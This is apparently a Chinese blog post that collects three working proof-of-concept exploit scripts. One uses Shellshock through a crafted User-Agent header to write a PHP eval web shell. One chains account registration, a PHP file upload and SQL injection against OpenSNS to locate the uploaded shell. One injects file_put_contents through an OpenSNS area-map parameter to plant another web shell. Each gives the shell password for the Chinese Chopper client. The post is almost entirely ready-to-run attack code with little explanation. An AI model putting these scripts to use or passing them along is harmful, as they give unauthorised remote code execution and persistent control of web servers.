一些网站的poc

作者: ifqu | 来源:发表于2018-06-13 10:57 被阅读0次

一些网站的poc
关于PoC调整的一些意见
🐵计算机漏洞安全相关的概念
POC生态布道者虫哥：希望POC共识让时光倒流回2011年，如何
简书的PoC是什么
POC 的特点
VB网为何在布局POC生态？
#2021.8.15#会员收益No.19
#2021.8.16#会员收益No.20
#2021.8.13#会员收益No.17

bash漏洞的poc

import requests
url='http://10.4.0.12/cgi-bin/duweihy123.cgi'
headers={"User-Agent":"() { :;}; echo `/bin/echo '<?php @eval($_POST[\"c\"]);?>' > /usr/local/nginx/html/duwei321.php`"}
#apache /var/www/html
response=requests.get(url,headers=headers)
print(response.text)

菜刀链接，一句话密码是c,路径是http://xxx/duwei321.php
opensns网站的poc

# -*- coding:utf-8 -*-

import requests
import random
import re
import os

s = requests.Session()
url = 'http://10.2.0.112/'     #！！！此处需改动

def getRandomName():
    name = ''
    for i in range(4):
        name += chr(random.randint(97, 122))
    return name

def register():
    global s
    registerUrl = url + 'index.php?s=/ucenter/member/register.html'
    nickname = getRandomName()

    headers = {
        'Referer': registerUrl,
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    data = {
        'role': '1',
        'username': nickname+'@test.com',
        'nickname': nickname,
        'password': '123456',
        'reg_type': 'email',
    }
    r = s.post(registerUrl, data=data, headers=headers)

    return nickname

def login(username):
    global s
    loginUrl = url + 'index.php?s=/ucenter/member/login.html'

    headers = {
        'Referer': loginUrl,
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        #'X-Requested-With': 'XMLHttpRequest',
    }
    data = {
        'username': username,
        'password': '123456',
        'remember': '0',
        'from': loginUrl,
    }
    r = s.post(loginUrl, data=data, headers=headers)
    #print(r.text)

def upload():
    global s
    uploadUrl = url + 'index.php?s=/weibo/share/doSendShare.html'
    file = {'file_img': open('/Users/fuqi/Desktop/small.php', 'r')}     #！！！此处需改动
    data = {
        'content': '123',
        'query': 'app=Home&model=File&method=upload&id=',
    }
    r = s.post(uploadUrl, data=data, files=file)
    #print(r.text)

def getShell():
    global s
    exp = url + 'index.php?s=/ucenter/index/information/uid/23333 union (select 1,2,concat(savepath,savename),4 from ocenter_file where savename like 0x252e706870 order by id desc limit 0,1)#.html'
    r = s.get(exp)
    pattern=re.compile(r'<attr title=.*?>(.*?)</attr>')
    item=re.findall(pattern, r.text)
    print(item)

def main():
    username = register()
    login(username)
    upload()
    getShell()

if __name__ == '__main__':
    main() 

os.system("pause")

菜刀链接，路径会返回

opensns另外一个版本的poc

import requests
url='http://10.2.0.141/index.php?s=people/index/area.html'
data={
    'areamap':"/map/e",
    'areasite':"file_put_contents('/usr/share/nginx/open/Uploads/15.php','<?php eval($_POST[lac]);?>');"
}
reponse=requests.post(url,data=data)
print(reponse.status_code)

菜刀链接，密码是lac，位置在upload的路径下